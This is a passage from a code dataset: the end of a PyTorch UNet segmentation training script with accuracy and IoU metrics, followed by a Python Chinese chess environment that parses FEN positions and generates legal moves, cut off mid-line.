torch.nn.functional as F\r\nfrom torch.autograd import Variable\r\nfrom PIL import Image\r\nimport numpy as np\r\n\r\nfrom model import UNet\r\nfrom sklearn.metrics import confusion_matrix\r\n\r\ndef get_data(mode):\r\n x, y = [], []\r\n for i in tqdm.tqdm(os.listdir('data/{}/images'.format(mode))):\r\n img = cv2.imread('data/{}/images/{}'.format(mode, i))\r\n mask = np.array(Image.open('data/{}/1st_manual/{}.gif'.format(mode, i.split('.')[0])))\r\n\r\n mask[mask != 0] = 1\r\n\r\n img = cv2.resize(img, (256, 256))\r\n mask = cv2.resize(mask, (256, 256), interpolation=cv2.INTER_NEAREST)\r\n\r\n x.append(img)\r\n y.append(mask)\r\n\r\n x, y = np.array(x, dtype=np.float) / 255.0, np.array(y)\r\n x = np.transpose(x, axes=[0, 3, 1, 2])\r\n\r\n print('success load {} set'.format(mode))\r\n return x, y\r\n\r\n\r\ndef metrice(y_true, y_pred):\r\n y_true, y_pred = y_true.to('cpu').detach().numpy(), np.argmax(y_pred.to('cpu').detach().numpy(), axis=1)\r\n y_true, y_pred = y_true.reshape((-1)), y_pred.reshape((-1))\r\n cm = confusion_matrix(y_true, y_pred, labels=[0, 1])\r\n\r\n pa = np.diag(cm).sum() / (cm.sum() + 1e-7)\r\n\r\n mpa_arr = np.diag(cm) / (cm.sum(axis=1) + 1e-7)\r\n mpa = np.nanmean(mpa_arr)\r\n\r\n MIoU = np.diag(cm) / (np.sum(cm, axis=1) + np.sum(cm, axis=0) - np.diag(cm) + 1e-7)\r\n MIoU = np.nanmean(MIoU)\r\n\r\n return pa, mpa, MIoU\r\n\r\n\r\nif __name__ == '__main__':\r\n BATCH_SIZE = 8\r\n\r\n DEVICE = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n print(DEVICE)\r\n\r\n Name = 'UNet'\r\n model = UNet()\r\n print(sum(p.numel() for p in model.parameters()))\r\n\r\n x_train, y_train = get_data('train')\r\n x_val, y_val = get_data('test')\r\n\r\n train_dataset = torch.utils.data.TensorDataset(torch.from_numpy(x_train), torch.from_numpy(y_train))\r\n train_iter = torch.utils.data.DataLoader(train_dataset, BATCH_SIZE, shuffle=True)\r\n\r\n val_dataset = torch.utils.data.TensorDataset(torch.from_numpy(x_val), torch.from_numpy(y_val))\r\n val_iter = torch.utils.data.DataLoader(val_dataset, BATCH_SIZE, shuffle=True)\r\n\r\n optimizer = torch.optim.Adam(params=model.parameters(), lr=0.0001, weight_decay=0.001)\r\n loss = nn.CrossEntropyLoss().to(DEVICE)\r\n\r\n with open('{}.log'.format(Name), 'w+') as f:\r\n f.write('epoch,train_loss,test_loss,train_pa,test_pa,train_mpa,test_mpa,train_miou,test_miou')\r\n best_miou = 0\r\n print('{} begin train!'.format(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')))\r\n for epoch in range(100):\r\n model.to(DEVICE)\r\n model.train()\r\n train_loss = 0\r\n begin = time.time()\r\n num = 0\r\n train_pa, train_mpa, train_miou = 0, 0, 0\r\n for x, y in train_iter:\r\n x, y = x.to(DEVICE), y.to(DEVICE).long()\r\n pred = model(x.float())\r\n l = loss(pred, y)\r\n optimizer.zero_grad()\r\n l.backward()\r\n optimizer.step()\r\n\r\n train_loss += float(l.data)\r\n train_pa_, train_mpa_, train_miou_ = metrice(y, pred)\r\n train_pa += train_pa_\r\n train_mpa += train_mpa_\r\n train_miou += train_miou_\r\n num += 1\r\n train_loss /= num\r\n train_pa, train_mpa, train_miou = train_pa / num, train_mpa / num, train_miou / num\r\n\r\n num = 0\r\n test_loss = 0\r\n model.eval()\r\n test_pa, test_mpa, test_miou = 0, 0, 0\r\n with torch.no_grad():\r\n for x, y in val_iter:\r\n x, y = x.to(DEVICE), y.to(DEVICE).long()\r\n\r\n pred = model(x.float())\r\n l = loss(pred, y)\r\n num += 1\r\n test_loss += float(l.data)\r\n\r\n test_pa_, test_mpa_, test_miou_ = metrice(y, pred)\r\n test_pa += test_pa_\r\n test_mpa += test_mpa_\r\n test_miou += 
test_miou_\r\n\r\n test_loss /= num\r\n test_pa, test_mpa, test_miou = test_pa / num, test_mpa / num, test_miou / num\r\n\r\n if test_miou > best_miou:\r\n best_miou = test_miou\r\n model.to('cpu')\r\n torch.save(model, '{}.pkl'.format(Name))\r\n print(\r\n '{} epoch:{}, time:{:.2f}s, train_loss:{:.4f}, val_loss:{:.4f}, train_pa:{:.4f}, val_pa:{:.4f}, train_mpa:{:.4f}, test_mpa:{:.4f}, train_miou:{:.4f}, test_miou:{:.4f}'.format(\r\n datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\r\n epoch + 1, time.time() - begin, train_loss, test_loss,\r\n train_pa, test_pa, train_mpa, test_mpa, train_miou, test_miou\r\n ))\r\n with open('{}.log'.format(Name), 'a+') as f:\r\n f.write('\\n{},{:.4f},{:.4f},{:.4f},{:.4f},{:.4f},{:.4f},{:.4f},{:.4f}'.format(\r\n epoch, train_loss, test_loss, train_pa, test_pa, train_mpa, test_mpa, train_miou, test_miou\r\n ))\r\n","repo_name":"zexuanli-sc202zl/MSc-project","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16824541971","text":"\"\"\"\n中国象棋环境\n主要功能:\n1. 获取当前可行动作\n2. step\n3. 判断游戏是否结束\n4. 将 statestr 转换成 plane\n\"\"\"\nimport copy\n\nimport numpy as np\nfrom enum import IntEnum\nfrom env.cchess_env_c import CchessEnvC\n\n\nFULL_INIT_FEN = 'rnbakabnr/9/1c5c1/p1p1p1p1p/9/9/P1P1P1P1P/1C5C1/9/RNBAKABNR w - - 0 1'\ny_axis = '9876543210'\nx_axis = 'abcdefghi'\n\n\nclass ChessSide(IntEnum):\n RED = 0\n BLACK = 1\n\n @staticmethod\n def next_side(side):\n return {ChessSide.RED: ChessSide.BLACK, ChessSide.BLACK: ChessSide.RED}[side]\n\n\nclass Pos(object):\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def abs_diff(self, other):\n return abs(self.x - other.x), abs(self.y - other.y)\n\n def middle(self, other):\n return Pos((self.x + other.x) / 2, (self.y + other.y) / 2)\n\n def __str__(self):\n return str(self.x) + \":\" + str(self.y)\n\n def __eq__(self, other):\n return (self.x == other.x) and (self.y == other.y)\n\n def __ne__(self, other):\n return (self.x != other.x) or (self.y != other.y)\n\n def __call__(self):\n return self.x, self.y\n\n\nclass BaseChessBoard(object):\n def __init__(self, fen=None):\n self._board = None\n self.move_side = None\n self.clear()\n self.round = 0\n if fen:\n self.from_fen(fen)\n\n def clear(self):\n self._board = [[None for x in range(9)] for y in range(10)]\n self.move_side = ChessSide.RED\n\n def copy(self):\n return copy.deepcopy(self)\n\n def put_fench(self, fench, pos):\n if self._board[pos.y][pos.x] is not None:\n return False\n\n self._board[pos.y][pos.x] = fench\n\n return True\n\n @staticmethod\n def judge_side(fen_ch):\n return ChessSide.BLACK if fen_ch.islower() else ChessSide.RED\n\n def is_valid_move(self, pos_from, pos_to):\n \"\"\"\n 只进行最基本的走子规则检查,不对每个子的规则进行检查,以加快文件加载之类的速度\n \"\"\"\n if not (0 <= pos_to.x <= 8):\n return False\n if not (0 <= pos_to.y <= 9):\n return False\n\n fench_from = self._board[pos_from.y][pos_from.x]\n if not fench_from:\n return False\n\n from_side = self.judge_side(fench_from)\n\n # move_side 不是None值才会进行走子颜色检查,这样处理某些特殊的存储格式时会处理比较迅速\n if self.move_side and (from_side != self.move_side):\n return False\n\n fench_to = self._board[pos_to.y][pos_to.x]\n if not fench_to:\n return True\n\n to_side = self.judge_side(fench_to)\n\n return from_side != to_side\n\n def _move_piece(self, pos_from, pos_to):\n\n fench = self._board[pos_from.y][pos_from.x]\n self._board[pos_to.y][pos_to.x] = fench\n self._board[pos_from.y][pos_from.x] = None\n\n 
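# The metrice() helper in the UNet training script above derives pixel
# accuracy (pa), mean per-class accuracy (mpa) and mean IoU from a single
# confusion matrix. A tiny hand-checkable 2-class example of the same
# formulas (without the 1e-7 smoothing terms):
import numpy as np
from sklearn.metrics import confusion_matrix

y_true = np.array([0, 0, 1, 1])
y_pred = np.array([0, 1, 1, 1])
cm = confusion_matrix(y_true, y_pred, labels=[0, 1])
# cm = [[1, 1],
#       [0, 2]]   rows = true class, columns = predicted class

pa = np.diag(cm).sum() / cm.sum()               # (1 + 2) / 4 = 0.75
mpa = np.nanmean(np.diag(cm) / cm.sum(axis=1))  # mean(1/2, 2/2) = 0.75
iou = np.diag(cm) / (cm.sum(axis=1) + cm.sum(axis=0) - np.diag(cm))
miou = np.nanmean(iou)                          # mean(1/2, 2/3) = 0.5833...
print(pa, mpa, miou)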
return fench\n\n def move(self, pos_from, pos_to):\n pos_from.y = 9 - pos_from.y\n pos_to.y = 9 - pos_to.y\n if not self.is_valid_move(pos_from, pos_to):\n return None\n\n self._move_piece(pos_from, pos_to)\n\n return 'step_success'\n\n def from_fen(self, fen):\n\n num_set = {'1', '2', '3', '4', '5', '6', '7', '8', '9'}\n ch_set = {'k', 'a', 'b', 'n', 'r', 'c', 'p'}\n\n self.clear()\n\n if not fen or fen == '':\n return\n\n fen = fen.strip()\n\n x = 0\n y = 9\n\n for i in range(0, len(fen)):\n ch = fen[i]\n\n if ch == ' ':\n break\n elif ch == '/':\n y -= 1\n x = 0\n if y < 0:\n break\n elif ch in num_set:\n x += int(ch)\n if x > 8:\n x = 8\n elif ch.lower() in ch_set:\n if x <= 8:\n self.put_fench(ch, Pos(x, y))\n x += 1\n else:\n return False\n\n fens = fen.split()\n\n self.move_side = None\n if (len(fens) >= 2) and (fens[1] == 'b'):\n self.move_side = ChessSide.BLACK\n else:\n self.move_side = ChessSide.RED\n\n if len(fens) >= 6:\n self.round = int(fens[5])\n else:\n self.round = 1\n\n return True\n\n def get_board_arr(self):\n return np.asarray(self._board[::-1])\n\n\ndef create_uci_labels():\n \"\"\"创建所有合法走子UCI,size 2086\"\"\"\n labels_array = []\n letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i']\n numbers = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n\n advisor_labels = ['d7e8', 'e8d7', 'e8f9', 'f9e8', 'd0e1', 'e1d0', 'e1f2', 'f2e1',\n 'd2e1', 'e1d2', 'e1f0', 'f0e1', 'd9e8', 'e8d9', 'e8f7', 'f7e8']\n bishop_labels = ['a2c4', 'c4a2', 'c0e2', 'e2c0', 'e2g4', 'g4e2', 'g0i2', 'i2g0',\n 'a7c9', 'c9a7', 'c5e7', 'e7c5', 'e7g9', 'g9e7', 'g5i7', 'i7g5',\n 'a2c0', 'c0a2', 'c4e2', 'e2c4', 'e2g0', 'g0e2', 'g4i2', 'i2g4',\n 'a7c5', 'c5a7', 'c9e7', 'e7c9', 'e7g5', 'g5e7', 'g9i7', 'i7g9']\n\n for l1 in range(9):\n for n1 in range(10):\n destinations = [(t, n1) for t in range(9)] + \\\n [(l1, t) for t in range(10)] + \\\n [(l1 + a, n1 + b) for (a, b) in\n [(-2, -1), (-1, -2), (-2, 1), (1, -2), (2, -1), (-1, 2), (2, 1), (1, 2)]] # 马走日\n for (l2, n2) in destinations:\n if (l1, n1) != (l2, n2) and l2 in range(9) and n2 in range(10):\n move = letters[l1] + numbers[n1] + letters[l2] + numbers[n2]\n labels_array.append(move)\n\n for p in advisor_labels:\n labels_array.append(p)\n\n for p in bishop_labels:\n labels_array.append(p)\n\n return labels_array\n\n\ndef create_position_labels():\n \"\"\"\n ['a0', 'a1', 'a2', 'a3', 'a4', 'a5', 'a6', 'a7', 'a8', 'a9',\n 'b0', 'b1', 'b2', 'b3', 'b4', 'b5', 'b6', 'b7', 'b8', 'b9',\n 'c0', 'c1', 'c2', 'c3', 'c4', 'c5', 'c6', 'c7', 'c8', 'c9',\n 'd0', 'd1', 'd2', 'd3', 'd4', 'd5', 'd6', 'd7', 'd8', 'd9',\n 'e0', 'e1', 'e2', 'e3', 'e4', 'e5', 'e6', 'e7', 'e8', 'e9',\n 'f0', 'f1', 'f2', 'f3', 'f4', 'f5', 'f6', 'f7', 'f8', 'f9',\n 'g0', 'g1', 'g2', 'g3', 'g4', 'g5', 'g6', 'g7', 'g8', 'g9',\n 'h0', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'h7', 'h8', 'h9',\n 'i0', 'i1', 'i2', 'i3', 'i4', 'i5', 'i6', 'i7', 'i8', 'i9']\n \"\"\"\n labels_array = []\n letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i']\n letters.reverse()\n numbers = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n\n for l1 in range(9):\n for n1 in range(10):\n move = letters[8 - l1] + numbers[n1]\n labels_array.append(move)\n return labels_array\n\n\ndef create_position_labels_reverse():\n \"\"\"\n ['a9', 'a8', 'a7', 'a6', 'a5', 'a4', 'a3', 'a2', 'a1', 'a0',\n 'b9', 'b8', 'b7', 'b6', 'b5', 'b4', 'b3', 'b2', 'b1', 'b0',\n 'c9', 'c8', 'c7', 'c6', 'c5', 'c4', 'c3', 'c2', 'c1', 'c0',\n 'd9', 'd8', 'd7', 'd6', 'd5', 'd4', 'd3', 'd2', 'd1', 'd0',\n 'e9', 'e8', 'e7', 'e6', 'e5', 'e4', 'e3', 'e2', 
'e1', 'e0',\n 'f9', 'f8', 'f7', 'f6', 'f5', 'f4', 'f3', 'f2', 'f1', 'f0',\n 'g9', 'g8', 'g7', 'g6', 'g5', 'g4', 'g3', 'g2', 'g1', 'g0',\n 'h9', 'h8', 'h7', 'h6', 'h5', 'h4', 'h3', 'h2', 'h1', 'h0',\n 'i9', 'i8', 'i7', 'i6', 'i5', 'i4', 'i3', 'i2', 'i1', 'i0']\n \"\"\"\n labels_array = []\n letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i']\n letters.reverse()\n numbers = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n\n for l1 in range(9):\n for n1 in range(10):\n move = letters[l1] + numbers[n1]\n labels_array.append(move)\n labels_array.reverse()\n return labels_array\n\n\nclass CchessEnv(object):\n \"\"\"\n board_pos_name\n [['a0' 'b0' 'c0' 'd0' 'e0' 'f0' 'g0' 'h0' 'i0']\n ['a1' 'b1' 'c1' 'd1' 'e1' 'f1' 'g1' 'h1' 'i1']\n ['a2' 'b2' 'c2' 'd2' 'e2' 'f2' 'g2' 'h2' 'i2']\n ['a3' 'b3' 'c3' 'd3' 'e3' 'f3' 'g3' 'h3' 'i3']\n ['a4' 'b4' 'c4' 'd4' 'e4' 'f4' 'g4' 'h4' 'i4']\n ['a5' 'b5' 'c5' 'd5' 'e5' 'f5' 'g5' 'h5' 'i5']\n ['a6' 'b6' 'c6' 'd6' 'e6' 'f6' 'g6' 'h6' 'i6']\n ['a7' 'b7' 'c7' 'd7' 'e7' 'f7' 'g7' 'h7' 'i7']\n ['a8' 'b8' 'c8' 'd8' 'e8' 'f8' 'g8' 'h8' 'i8']\n ['a9' 'b9' 'c9' 'd9' 'e9' 'f9' 'g9' 'h9' 'i9']]\n \"\"\"\n board_pos_name = np.array(create_position_labels()).reshape(9, 10).transpose()\n Ny = 10\n Nx = 9\n\n def __init__(self):\n self.name = 'a chess env'\n\n @staticmethod\n def expand_num(single_line):\n single_line = single_line.replace(\"2\", \"11\")\n single_line = single_line.replace(\"3\", \"111\")\n single_line = single_line.replace(\"4\", \"1111\")\n single_line = single_line.replace(\"5\", \"11111\")\n single_line = single_line.replace(\"6\", \"111111\")\n single_line = single_line.replace(\"7\", \"1111111\")\n single_line = single_line.replace(\"8\", \"11111111\")\n single_line = single_line.replace(\"9\", \"111111111\")\n return single_line\n\n @staticmethod\n def compress_num(single_line):\n single_line = single_line.replace(\"111111111\", \"9\")\n single_line = single_line.replace(\"11111111\", \"8\")\n single_line = single_line.replace(\"1111111\", \"7\")\n single_line = single_line.replace(\"111111\", \"6\")\n single_line = single_line.replace(\"11111\", \"5\")\n single_line = single_line.replace(\"1111\", \"4\")\n single_line = single_line.replace(\"111\", \"3\")\n single_line = single_line.replace(\"11\", \"2\")\n return single_line\n\n @staticmethod\n def sim_do_action(in_action, in_state):\n x_trans = {'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, 'f': 5, 'g': 6, 'h': 7, 'i': 8}\n\n src = in_action[0:2]\n dst = in_action[2:4]\n\n src_x = int(x_trans[src[0]])\n src_y = int(src[1])\n\n dst_x = int(x_trans[dst[0]])\n dst_y = int(dst[1])\n\n # change two line or one line\n board = in_state.split('/')\n if src_y != dst_y:\n board_src_y = board[src_y]\n board_dst_y = board[dst_y]\n board_src_y = list(CchessEnv.expand_num(board_src_y))\n board_dst_y = list(CchessEnv.expand_num(board_dst_y))\n board_dst_y[dst_x] = board_src_y[src_x]\n board_src_y[src_x] = '1'\n board[src_y] = CchessEnv.compress_num(''.join(board_src_y))\n board[dst_y] = CchessEnv.compress_num(''.join(board_dst_y))\n else:\n board_line = board[src_y]\n board_line = list(CchessEnv.expand_num(board_line))\n board_line[dst_x] = board_line[src_x]\n board_line[src_x] = '1'\n board[src_y] = CchessEnv.compress_num(''.join(board_line))\n board = \"/\".join(board)\n return board\n\n @staticmethod\n def replace_num(board):\n board = CchessEnv.expand_num(board)\n return board.split(\"/\")\n\n @staticmethod\n def check_bounds(to_y, to_x):\n if to_y < 0 or to_x < 0:\n return False\n\n if to_y >= CchessEnv.Ny or 
to_x >= CchessEnv.Nx:\n return False\n\n return True\n\n @staticmethod\n def validate_move(c, upper=True):\n if c.isalpha():\n if upper is True:\n if c.islower():\n return True\n else:\n return False\n else:\n if c.isupper():\n return True\n else:\n return False\n else:\n return True\n\n @staticmethod\n def get_king_pos(state_str):\n ys_label = '9876543210'[::-1]\n xs_label = 'abcdefghi'\n board_king = state_str.replace(\"1\", \" \")\n board_king = board_king.replace(\"2\", \" \")\n board_king = board_king.replace(\"3\", \" \")\n board_king = board_king.replace(\"4\", \" \")\n board_king = board_king.replace(\"5\", \" \")\n board_king = board_king.replace(\"6\", \" \")\n board_king = board_king.replace(\"7\", \" \")\n board_king = board_king.replace(\"8\", \" \")\n board_king = board_king.replace(\"9\", \" \")\n board_king = board_king.split('/')\n\n k_big, k = '', ''\n for i in range(3):\n pos = board_king[i].find('K')\n if pos != -1:\n k_big = \"{}{}\".format(xs_label[pos], ys_label[i])\n break\n for i in range(-1, -4, -1):\n pos = board_king[i].find('k')\n if pos != -1:\n k = \"{}{}\".format(xs_label[pos], ys_label[i])\n break\n return k_big, k\n\n @staticmethod\n def is_check_catch(state_str, next_player):\n \"\"\"\n :param state_str: String, input FEN state str\n :param next_player: String, 'w' or 'b'\n :return : Boolean, 下一步对手是否可以将军\n \"\"\"\n moveset = CchessEnv.get_legal_moves(state_str, next_player)\n targetset = set([i[-2:] for i in moveset])\n\n wk, bk = CchessEnv.get_king_pos(state_str)\n targetkingdic = {'b': wk, 'w': bk}\n targ_king = targetkingdic[next_player]\n # TODO add long catch logic\n if targ_king in targetset:\n return True\n else:\n return False\n\n @staticmethod\n def game_end(state_str, current_player):\n \"\"\"\n :param state_str: String, input FEN state str\n :param current_player: String, 'w' or 'b'\n\n :return : (Boolean, String), 游戏是否结束, 胜者\n \"\"\"\n # TODO add long catch\n if state_str.find('k') == -1:\n return True, 'w'\n elif state_str.find('K') == -1:\n return True, 'b'\n wk, bk = CchessEnv.get_king_pos(state_str)\n target_king_dic = {'b': wk, 'w': bk}\n move_set = CchessEnv.get_legal_moves(state_str, current_player)\n dst_point = [i[-2:] for i in move_set]\n\n targetset = set(dst_point)\n\n targ_king = target_king_dic[current_player]\n if targ_king in targetset:\n return True, current_player\n return False, None\n\n @staticmethod\n def get_legal_moves(state, current_player):\n \"\"\"\n :param state: string, input FEN state str\n :param current_player: string, 'w' or 'b' current player\n\n : return legal moves: List\n \"\"\"\n\n moves = []\n k_x = None\n k_y = None\n\n K_x = None\n K_y = None\n\n face_to_face = False\n\n board_positions = np.array(CchessEnv.replace_num(state))\n for y in range(board_positions.shape[0]):\n for x in range(len(board_positions[y])):\n if board_positions[y][x].isalpha():\n # 黑车\n if board_positions[y][x] == 'r' and current_player == 'b':\n # 左右\n to_y = y\n for to_x in range(x - 1, -1, -1):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].isupper():\n moves.append(m)\n break\n\n moves.append(m)\n\n for to_x in range(x + 1, CchessEnv.Nx):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].isupper():\n moves.append(m)\n break\n\n moves.append(m)\n\n # 上下\n to_x = x\n for to_y in range(y - 1, -1, -1):\n m = 
CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].isupper():\n moves.append(m)\n break\n\n moves.append(m)\n\n for to_y in range(y + 1, CchessEnv.Ny):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].isupper():\n moves.append(m)\n break\n\n moves.append(m)\n\n # 红车\n elif board_positions[y][x] == 'R' and current_player == 'w':\n to_y = y\n for to_x in range(x - 1, -1, -1):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].islower():\n moves.append(m)\n break\n\n moves.append(m)\n\n for to_x in range(x + 1, CchessEnv.Nx):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].islower():\n moves.append(m)\n break\n\n moves.append(m)\n\n to_x = x\n for to_y in range(y - 1, -1, -1):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].islower():\n moves.append(m)\n break\n\n moves.append(m)\n\n for to_y in range(y + 1, CchessEnv.Ny):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].islower():\n moves.append(m)\n break\n\n moves.append(m)\n\n # 马\n elif (board_positions[y][x] == 'n' or board_positions[y][x] == 'h') and current_player == 'b':\n for i in range(-1, 3, 2):\n for j in range(-1, 3, 2):\n to_y = y + 2 * i\n to_x = x + 1 * j\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=False) and \\\n board_positions[to_y - i][x].isalpha() is False:\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n to_y = y + 1 * i\n to_x = x + 2 * j\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=False) and \\\n board_positions[y][to_x - j].isalpha() is False:\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n elif (board_positions[y][x] == 'N' or board_positions[y][x] == 'H') and current_player == 'w':\n for i in range(-1, 3, 2):\n for j in range(-1, 3, 2):\n to_y = y + 2 * i\n to_x = x + 1 * j\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=True) and \\\n board_positions[to_y - i][x].isalpha() is False:\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n to_y = y + 1 * i\n to_x = x + 2 * j\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=True) and \\\n board_positions[y][to_x - j].isalpha() is False:\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n # 象\n elif (board_positions[y][x] == 'b' or board_positions[y][x] == 'e') and current_player == 'b':\n for i in range(-2, 3, 4):\n to_y = y + i\n to_x = x + i\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=False) and \\\n to_y >= 5 and board_positions[y + i // 2][x + i // 2].isalpha() is False:\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n\n to_y = y + i\n to_x = x - i\n if 
CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=False) and \\\n to_y >= 5 and board_positions[y + i // 2][x - i // 2].isalpha() is False:\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n elif (board_positions[y][x] == 'B' or board_positions[y][x] == 'E') and current_player == 'w':\n for i in range(-2, 3, 4):\n to_y = y + i\n to_x = x + i\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=True) and \\\n to_y <= 4 and board_positions[y + i // 2][x + i // 2].isalpha() is False:\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n\n to_y = y + i\n to_x = x - i\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=True) and \\\n to_y <= 4 and board_positions[y + i // 2][x - i // 2].isalpha() is False:\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n # 士\n elif board_positions[y][x] == 'a' and current_player == 'b':\n for i in range(-1, 3, 2):\n to_y = y + i\n to_x = x + i\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=False) and \\\n to_y >= 7 and 3 <= to_x <= 5:\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n\n to_y = y + i\n to_x = x - i\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=False) and \\\n to_y >= 7 and 3 <= to_x <= 5:\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n elif board_positions[y][x] == 'A' and current_player == 'w':\n for i in range(-1, 3, 2):\n to_y = y + i\n to_x = x + i\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=True) \\\n and to_y <= 2 and 3 <= to_x <= 5:\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n\n to_y = y + i\n to_x = x - i\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=True) \\\n and to_y <= 2 and 3 <= to_x <= 5:\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n # 将 帅\n elif board_positions[y][x] == 'k':\n k_x = x\n k_y = y\n if current_player == 'b':\n for i in range(2):\n for sign in range(-1, 2, 2):\n j = 1 - i\n to_y = y + i * sign\n to_x = x + j * sign\n\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=False) \\\n and to_y >= 7 and 3 <= to_x <= 5:\n moves.append(\n CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n )\n elif board_positions[y][x] == 'K':\n K_x = x\n K_y = y\n if current_player == 'w':\n for i in range(2):\n for sign in range(-1, 2, 2):\n j = 1 - i\n to_y = y + i * sign\n to_x = x + j * sign\n\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=True) and \\\n to_y <= 2 and 3 <= to_x <= 5:\n moves.append(\n CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n )\n # 炮\n elif board_positions[y][x] == 'c' and current_player == 'b':\n to_y = y\n hits = False # 可不可以架炮\n for to_x in range(x - 1, -1, -1):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if hits is False:\n if board_positions[to_y][to_x].isalpha():\n hits = True\n else:\n moves.append(m)\n else:\n if 
board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].isupper():\n moves.append(m)\n break\n\n hits = False\n for to_x in range(x + 1, CchessEnv.Nx):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if hits is False:\n if board_positions[to_y][to_x].isalpha():\n hits = True\n else:\n moves.append(m)\n else:\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].isupper():\n moves.append(m)\n break\n\n to_x = x\n hits = False\n for to_y in range(y - 1, -1, -1):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if hits is False:\n if board_positions[to_y][to_x].isalpha():\n hits = True\n else:\n moves.append(m)\n else:\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].isupper():\n moves.append(m)\n break\n\n hits = False\n for to_y in range(y + 1, CchessEnv.Ny):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if hits is False:\n if board_positions[to_y][to_x].isalpha():\n hits = True\n else:\n moves.append(m)\n else:\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].isupper():\n moves.append(m)\n break\n elif board_positions[y][x] == 'C' and current_player == 'w':\n to_y = y\n hits = False\n for to_x in range(x - 1, -1, -1):\n m = CchessEnv.board_pos_name[y][x] + 